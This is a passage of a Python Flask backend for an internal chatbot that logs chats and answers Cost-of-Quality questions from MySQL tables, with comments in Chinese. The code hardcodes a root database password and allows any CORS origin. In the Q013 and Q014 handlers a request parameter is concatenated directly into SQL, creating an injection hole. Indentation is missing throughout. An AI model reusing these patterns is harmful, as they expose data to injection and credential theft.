tmp['userChineseName'] = r[16]
returnData[c] = tmp
c = c + 1
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# a. 談話紀錄
@app.route("/chatLog", methods=['GET'])
def chatLog():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cnxn = pyodbc.connect('DRIVER={SQL Server}; Server=localhost\SQLEXPRESS;Database=coq;Trusted_Connection=True;')
curMS = cnxn.cursor()
returnData = OrderedDict();
cur = conn.cursor()
PERNR = request.args.get('PERNR');
chat = request.args.get('chat');
sessionsId = request.args.get('sessionsId');
curMS.execute("select NACHN,VORNA from emp01_hiring where PERNR=?",(PERNR))
name = curMS.fetchone()
NACHN = name[0]
VORNA = name[1]
checktime = datetime.datetime.fromtimestamp(round(time.time(), 0)).strftime('%Y-%m-%d %H:%M:%S')
checktime1 = datetime.datetime.fromtimestamp(round(time.time(), 0)).strftime('%m-%d %H:%M:%S')
cur.execute("insert into iknow.chatLog(PERNR,chat,sessionsId,checktime,userChineseName,feedback,answerType,status)values(%s,%s,%s,%s,%s,2,0,0)",(PERNR,chat,sessionsId,checktime,NACHN+VORNA))
#print(conn.insert_id())
#print(cur.lastrowid)
returnData[0] = checktime1;
returnData[1] = cur.lastrowid;
cur.execute("COMMIT")
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
def updateChat(app,yearmonth,answerNo,answerText,Chat_ID):
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'iknow')
cur = conn.cursor()
cur.execute("update iknow.chatLog set app=%s,yearmonth=%s,answerNo=%s,answerText=%s where id=%s",(app,yearmonth,answerNo,answerText,Chat_ID))
cur.execute("COMMIT")
# getAnswer 20200131
@app.route("/getAnswer", methods=['GET'])
def getAnswer():
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID');
answerNo = request.args.get('answerNo');
if answerNo == "Q001" : # Q001 CoQ現況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = int(cur.fetchone()[0]);
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計(含供應商求償)(百萬元) sorting = '10'
cur.execute("SELECT cost FROM forboard where app=%s and yearmonth=%s and sorting = '10'",(app,yearmonth));
returnData[' (1) '+str(yearmonth)+app+ 'CoQ總計(含供應商求償)'] = str(round(cur.fetchone()[0]/1000000, 2))+'M (NTD)';
############## 原本Q002
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' (5) CoQ Rate 趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
print(yearmonth,' ',yearmonth2)
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
print(r[0],' ',r[1])
rate = round(float(r[0])/10000,2)
rate2 = round( float(r[1]) /10000,2)
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData[' (6) 較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
############## 原本Q004
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
returnData[' (2) '+str(yearmonth2)+' CoQ Rate'] = str(rate2)+'%';
returnData[' (3) '+str(yearmonth)+' CoQ Rate'] = str(rate)+'%';
############## 原本Q009
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[' (4) CoQ Rate Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q001',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q002" : # 2. Q002 CoQ / CoQ Rate 是否超標
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate'+'趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
returnData['CoQ Rate'] = str(rate)+'%';
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData['較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q002',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q003" : # 3. Q003 CoQ 達標狀況(未達標應用別)
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation_new where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
if belowStandardApp == '' :
belowStandardApp = '都有達標'
returnData[str(yearmonth)+' '+app+' 未達標應用別'] = belowStandardApp;
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q003',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q004" : # Q004 CoQ Rate現況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
#print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
#print(rate,' ',rate2)
#returnData['CoQ Rate'+str(yearmonth)+'現況'] = ' ';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate 現況<br>(1)'+str(yearmonth2)] = str(rate2)+'%';
returnData['(2)'+str(yearmonth)] = str(rate)+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q004',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q005" : # 5. Q005 預防成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='01'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 預防成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q005',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q006" : # 6. Q006 鑑定成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='02'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 鑑定成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q006',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q007" : # 7. Q007 外失成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select sum(cost) from forboard where yearmonth=%s and app=%s and sorting in ('04','05','06')",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q007',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q008" : # 8. Q008 內失成本是多少?
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='03'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q008',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q009" : # 9. Q009 CoQ rate target(目標)是多少
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q009',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q010" : # 10. Q010 外失售保成本是多少? sorting='05'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='05'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失售保成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q010',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q011" : # 11. Q011 AERB內失成本是多少? sorting='07'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select IFNULL(cost, 0) from forboard where yearmonth=%s and app=%s and sorting='07'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' AERB內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q011',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q012" : # 12. Q012 外失Rebate成本是多少? sorting='06'
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='06'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失Rebate成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q012',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q013" : # 13. Q013 Top3 Model
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 model
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 and rank = 1 order by rank,cost limit 5",(yearmonth))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 order by rank,cost limit 5",(yearmonth))
elif belowStandardApp != '':
cur.execute("select distinct bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost,rank from coq.mc where yearmonth=%s and length(board_title)=26 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+'(M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。該機種以客戶'+str(r[4])+'發生'+str(r[5])+'所佔最高,為'+str(r[6])+'(M NTD)';
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Model'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q013',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q014" : # 14. Q014 Top3 Customer
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 customer
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 and rank = 1 order by rank,cost limit 5",(yearmonth ))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 order by rank,cost limit 5",(yearmonth ))
elif belowStandardApp != '':
cur.execute("select distinct bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,`rank` from coq.mc where yearmonth=%s and length(board_title)=30 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+' (M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。'
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Customer'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q014',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q015" : # 15. Q015 預計損失圖
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute("SELECT round(sum(total)/1000000,2) FROM aerb where yearmonth=%s",(yearmonth))
AERB = cur.fetchone()[0];
returnData = OrderedDict();
returnData[str(yearmonth)+' '+app+' AERB預期未來損失'] = str(AERB)+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q015',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q016" : # 16. Q016 2018年度CoQ狀況
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
